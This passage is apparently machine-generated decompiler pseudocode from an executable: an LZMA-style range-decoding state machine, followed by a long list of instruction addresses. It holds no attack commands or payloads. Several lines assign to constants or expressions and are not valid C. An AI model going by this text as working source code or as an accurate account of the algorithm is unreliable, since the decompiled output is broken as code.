											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                                                              0x00000000
                                                                                                                              0x00406767
                                                                                                                              0x00406767
                                                                                                                              0x0040676b
                                                                                                                              0x00406790
                                                                                                                              0x0040679a
                                                                                                                              0x00000000
                                                                                                                              0x0040676d
                                                                                                                              0x0040676d
                                                                                                                              0x00406770
                                                                                                                              0x00406774
                                                                                                                              0x00406777
                                                                                                                              0x0040677a
                                                                                                                              0x0040677e
                                                                                                                              0x0040677e
                                                                                                                              0x00406781
                                                                                                                              0x0040685b
                                                                                                                              0x0040685b
                                                                                                                              0x00406862
                                                                                                                              0x00406862
                                                                                                                              0x00406865
                                                                                                                              0x0040686c
                                                                                                                              0x00406899
                                                                                                                              0x0040689d
                                                                                                                              0x004068fd
                                                                                                                              0x00406900
                                                                                                                              0x00406905
                                                                                                                              0x00406906
                                                                                                                              0x00406908
                                                                                                                              0x0040690a
                                                                                                                              0x0040690d
                                                                                                                              0x00406819
                                                                                                                              0x00406819
                                                                                                                              0x00406819
                                                                                                                              0x00405fb5
                                                                                                                              0x00405fb5
                                                                                                                              0x00405fb5
                                                                                                                              0x00405fbe
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fc4
                                                                                                                              0x00000000
                                                                                                                              0x00405fcf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fd8
                                                                                                                              0x00405fdb
                                                                                                                              0x00405fde
                                                                                                                              0x00405fe2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fe8
                                                                                                                              0x00405feb
                                                                                                                              0x00405fed
                                                                                                                              0x00405fee
                                                                                                                              0x00405ff1
                                                                                                                              0x00405ff3
                                                                                                                              0x00405ff4
                                                                                                                              0x00405ff6
                                                                                                                              0x00405ff9
                                                                                                                              0x00405ffe
                                                                                                                              0x00406003
                                                                                                                              0x0040600c
                                                                                                                              0x0040601f
                                                                                                                              0x00406022
                                                                                                                              0x0040602e
                                                                                                                              0x00406056
                                                                                                                              0x00406058
                                                                                                                              0x00406066
                                                                                                                              0x00406066
                                                                                                                              0x0040606a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040605a
                                                                                                                              0x0040605a
                                                                                                                              0x0040605d
                                                                                                                              0x0040605e
                                                                                                                              0x0040605e
                                                                                                                              0x00000000
                                                                                                                              0x0040605a
                                                                                                                              0x00406034
                                                                                                                              0x00406039
                                                                                                                              0x00406039
                                                                                                                              0x00406042
                                                                                                                              0x0040604a
                                                                                                                              0x0040604d
                                                                                                                              0x00000000
                                                                                                                              0x00406053
                                                                                                                              0x00406053
                                                                                                                              0x00000000
                                                                                                                              0x00406053
                                                                                                                              0x00000000
                                                                                                                              0x00406070
                                                                                                                              0x00406070
                                                                                                                              0x00406074
                                                                                                                              0x00406920
                                                                                                                              0x00000000
                                                                                                                              0x00406920
                                                                                                                              0x0040607d
                                                                                                                              0x0040608d
                                                                                                                              0x00406090
                                                                                                                              0x00406093
                                                                                                                              0x00406093
                                                                                                                              0x00406093
                                                                                                                              0x00406096
                                                                                                                              0x0040609a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040609c
                                                                                                                              0x004060a2
                                                                                                                              0x004060cc
                                                                                                                              0x004060d2
                                                                                                                              0x004060d9
                                                                                                                              0x00000000
                                                                                                                              0x004060d9
                                                                                                                              0x004060a8
                                                                                                                              0x004060ab
                                                                                                                              0x004060b0
                                                                                                                              0x004060b0
                                                                                                                              0x004060bb
                                                                                                                              0x004060c3
                                                                                                                              0x004060c6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040610b
                                                                                                                              0x00406111
                                                                                                                              0x00406114
                                                                                                                              0x00406121
                                                                                                                              0x00406129
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004060e0
                                                                                                                              0x004060e0
                                                                                                                              0x004060e4
                                                                                                                              0x0040692f
                                                                                                                              0x00000000
                                                                                                                              0x0040692f
                                                                                                                              0x004060f0
                                                                                                                              0x004060fb
                                                                                                                              0x004060fb
                                                                                                                              0x004060fb
                                                                                                                              0x004060fe
                                                                                                                              0x00406101
                                                                                                                              0x00406104
                                                                                                                              0x00406109
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004067a0
                                                                                                                              0x004067a0
                                                                                                                              0x004067a6
                                                                                                                              0x004067ac
                                                                                                                              0x004067b2
                                                                                                                              0x004067cc
                                                                                                                              0x004067cf
                                                                                                                              0x004067d5
                                                                                                                              0x004067e0
                                                                                                                              0x004067e0
                                                                                                                              0x004067e2
                                                                                                                              0x004067b4
                                                                                                                              0x004067b4
                                                                                                                              0x004067c3
                                                                                                                              0x004067c7
                                                                                                                              0x004067c7
                                                                                                                              0x004067ec
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004067ee
                                                                                                                              0x004067f2
                                                                                                                              0x004069a1
                                                                                                                              0x00000000
                                                                                                                              0x004069a1
                                                                                                                              0x004067fe
                                                                                                                              0x00406805
                                                                                                                              0x0040680d
                                                                                                                              0x00406810
                                                                                                                              0x00406813
                                                                                                                              0x00406813
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406131
                                                                                                                              0x00406133
                                                                                                                              0x00406136
                                                                                                                              0x004061a7
                                                                                                                              0x004061aa
                                                                                                                              0x004061ad
                                                                                                                              0x004061b4
                                                                                                                              0x004061be
                                                                                                                              0x00000000
                                                                                                                              0x004061be
                                                                                                                              0x00406138
                                                                                                                              0x0040613c
                                                                                                                              0x0040613f
                                                                                                                              0x00406141
                                                                                                                              0x00406144
                                                                                                                              0x00406147
                                                                                                                              0x00406149
                                                                                                                              0x0040614c
                                                                                                                              0x0040614e
                                                                                                                              0x00406153
                                                                                                                              0x00406156
                                                                                                                              0x00406159
                                                                                                                              0x0040615d
                                                                                                                              0x00406164
                                                                                                                              0x00406167
                                                                                                                              0x0040616e
                                                                                                                              0x00406172
                                                                                                                              0x0040617a
                                                                                                                              0x0040617a
                                                                                                                              0x0040617a
                                                                                                                              0x00406174
                                                                                                                              0x00406174
                                                                                                                              0x00406174
                                                                                                                              0x00406169
                                                                                                                              0x00406169
                                                                                                                              0x00406169
                                                                                                                              0x0040617e
                                                                                                                              0x00406181
                                                                                                                              0x0040619f
                                                                                                                              0x004061a1
                                                                                                                              0x00000000
                                                                                                                              0x00406183
                                                                                                                              0x00406183
                                                                                                                              0x00406186
                                                                                                                              0x00406189
                                                                                                                              0x0040618c
                                                                                                                              0x0040618e
                                                                                                                              0x0040618e
                                                                                                                              0x0040618e
                                                                                                                              0x00406191
                                                                                                                              0x00406194
                                                                                                                              0x00406196
                                                                                                                              0x00406197
                                                                                                                              0x0040619a
                                                                                                                              0x00000000
                                                                                                                              0x0040619a
                                                                                                                              0x00000000
                                                                                                                              0x004063d0
                                                                                                                              0x004063d4
                                                                                                                              0x004063f2
                                                                                                                              0x004063f5
                                                                                                                              0x004063fc
                                                                                                                              0x004063ff
                                                                                                                              0x00406402
                                                                                                                              0x00406405
                                                                                                                              0x00406408
                                                                                                                              0x0040640b
                                                                                                                              0x0040640d
                                                                                                                              0x00406414
                                                                                                                              0x00406415
                                                                                                                              0x00406417
                                                                                                                              0x0040641a
                                                                                                                              0x0040641d
                                                                                                                              0x00406420
                                                                                                                              0x00406420
                                                                                                                              0x00406425
                                                                                                                              0x00000000
                                                                                                                              0x00406425
                                                                                                                              0x004063d6
                                                                                                                              0x004063d9
                                                                                                                              0x004063dc
                                                                                                                              0x004063e6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040643a
                                                                                                                              0x0040643e
                                                                                                                              0x00406461
                                                                                                                              0x00406464
                                                                                                                              0x00406467
                                                                                                                              0x00406471
                                                                                                                              0x00406440
                                                                                                                              0x00406440
                                                                                                                              0x00406443
                                                                                                                              0x00406446
                                                                                                                              0x00406449
                                                                                                                              0x00406456
                                                                                                                              0x00406459
                                                                                                                              0x00406459
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040647d
                                                                                                                              0x00406481
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406487
                                                                                                                              0x0040648b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406491
                                                                                                                              0x00406493
                                                                                                                              0x00406497
                                                                                                                              0x00406497
                                                                                                                              0x0040649a
                                                                                                                              0x0040649e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004064ee
                                                                                                                              0x004064f2
                                                                                                                              0x004064f9
                                                                                                                              0x004064fc
                                                                                                                              0x004064ff
                                                                                                                              0x00406509
                                                                                                                              0x00000000
                                                                                                                              0x00406509
                                                                                                                              0x004064f4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406515
                                                                                                                              0x00406519
                                                                                                                              0x00406520
                                                                                                                              0x00406523
                                                                                                                              0x00406526
                                                                                                                              0x0040651b
                                                                                                                              0x0040651b
                                                                                                                              0x0040651b
                                                                                                                              0x00406529
                                                                                                                              0x0040652c
                                                                                                                              0x0040652f
                                                                                                                              0x0040652f
                                                                                                                              0x00406532
                                                                                                                              0x00406535
                                                                                                                              0x00406538
                                                                                                                              0x00406538
                                                                                                                              0x0040653b
                                                                                                                              0x00406542
                                                                                                                              0x00406547
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004065d5
                                                                                                                              0x004065d5
                                                                                                                              0x004065d9
                                                                                                                              0x00406977
                                                                                                                              0x00000000
                                                                                                                              0x00406977
                                                                                                                              0x004065df
                                                                                                                              0x004065e2
                                                                                                                              0x004065e5
                                                                                                                              0x004065e9
                                                                                                                              0x004065ec
                                                                                                                              0x004065f2
                                                                                                                              0x004065f4
                                                                                                                              0x004065f4
                                                                                                                              0x004065f4
                                                                                                                              0x004065f7
                                                                                                                              0x004065fa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004061ca
                                                                                                                              0x004061ca
                                                                                                                              0x004061ce
                                                                                                                              0x0040693b
                                                                                                                              0x00000000
                                                                                                                              0x0040693b
                                                                                                                              0x004061d4
                                                                                                                              0x004061d7
                                                                                                                              0x004061da
                                                                                                                              0x004061de
                                                                                                                              0x004061e1
                                                                                                                              0x004061e7
                                                                                                                              0x004061e9
                                                                                                                              0x004061e9
                                                                                                                              0x004061e9
                                                                                                                              0x004061ec
                                                                                                                              0x004061ef
                                                                                                                              0x004061ef
                                                                                                                              0x004061f2
                                                                                                                              0x004061f5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004061fb
                                                                                                                              0x00406201
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406207
                                                                                                                              0x00406207
                                                                                                                              0x0040620b
                                                                                                                              0x0040620e
                                                                                                                              0x00406211
                                                                                                                              0x00406214
                                                                                                                              0x00406217
                                                                                                                              0x00406218
                                                                                                                              0x0040621b
                                                                                                                              0x0040621d
                                                                                                                              0x00406223
                                                                                                                              0x00406226
                                                                                                                              0x00406229
                                                                                                                              0x0040622c
                                                                                                                              0x0040622f
                                                                                                                              0x00406232
                                                                                                                              0x00406235
                                                                                                                              0x00406251
                                                                                                                              0x00406254
                                                                                                                              0x00406257
                                                                                                                              0x0040625a
                                                                                                                              0x00406261
                                                                                                                              0x00406265
                                                                                                                              0x00406267
                                                                                                                              0x0040626b
                                                                                                                              0x00406237
                                                                                                                              0x00406237
                                                                                                                              0x0040623b
                                                                                                                              0x00406243
                                                                                                                              0x00406248
                                                                                                                              0x0040624a
                                                                                                                              0x0040624c
                                                                                                                              0x0040624c
                                                                                                                              0x0040626e
                                                                                                                              0x00406275
                                                                                                                              0x00406278
                                                                                                                              0x00000000
                                                                                                                              0x0040627e
                                                                                                                              0x00000000
                                                                                                                              0x0040627e
                                                                                                                              0x00000000
                                                                                                                              0x00406283
                                                                                                                              0x00406283
                                                                                                                              0x00406287
                                                                                                                              0x00406947
                                                                                                                              0x00000000
                                                                                                                              0x00406947
                                                                                                                              0x0040628d
                                                                                                                              0x00406290
                                                                                                                              0x00406293
                                                                                                                              0x00406297
                                                                                                                              0x0040629a
                                                                                                                              0x004062a0
                                                                                                                              0x004062a2
                                                                                                                              0x004062a2
                                                                                                                              0x004062a2
                                                                                                                              0x004062a5
                                                                                                                              0x004062a8
                                                                                                                              0x004062a8
                                                                                                                              0x004062a8
                                                                                                                              0x004062ae
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004062b0
                                                                                                                              0x004062b3
                                                                                                                              0x004062b6
                                                                                                                              0x004062b9
                                                                                                                              0x004062bc
                                                                                                                              0x004062bf
                                                                                                                              0x004062c2
                                                                                                                              0x004062c5
                                                                                                                              0x004062c8
                                                                                                                              0x004062cb
                                                                                                                              0x004062ce
                                                                                                                              0x004062e6
                                                                                                                              0x004062e9
                                                                                                                              0x004062ec
                                                                                                                              0x004062ef
                                                                                                                              0x004062ef
                                                                                                                              0x004062f2
                                                                                                                              0x004062f6
                                                                                                                              0x004062f8
                                                                                                                              0x004062d0
                                                                                                                              0x004062d0
                                                                                                                              0x004062d8
                                                                                                                              0x004062dd
                                                                                                                              0x004062df
                                                                                                                              0x004062e1
                                                                                                                              0x004062e1
                                                                                                                              0x004062fb
                                                                                                                              0x00406302
                                                                                                                              0x00406305
                                                                                                                              0x00000000
                                                                                                                              0x00406307
                                                                                                                              0x00000000
                                                                                                                              0x00406307
                                                                                                                              0x00406305
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406347
                                                                                                                              0x00406347
                                                                                                                              0x0040634b
                                                                                                                              0x00406953
                                                                                                                              0x00000000
                                                                                                                              0x00406953
                                                                                                                              0x00406351
                                                                                                                              0x00406354
                                                                                                                              0x00406357
                                                                                                                              0x0040635b
                                                                                                                              0x0040635e
                                                                                                                              0x00406364
                                                                                                                              0x00406366
                                                                                                                              0x00406366
                                                                                                                              0x00406366
                                                                                                                              0x00406369
                                                                                                                              0x0040636c
                                                                                                                              0x0040636c
                                                                                                                              0x00406372
                                                                                                                              0x00406310
                                                                                                                              0x00406310
                                                                                                                              0x00406313
                                                                                                                              0x00000000
                                                                                                                              0x00406313
                                                                                                                              0x00406374
                                                                                                                              0x00406374
                                                                                                                              0x00406377
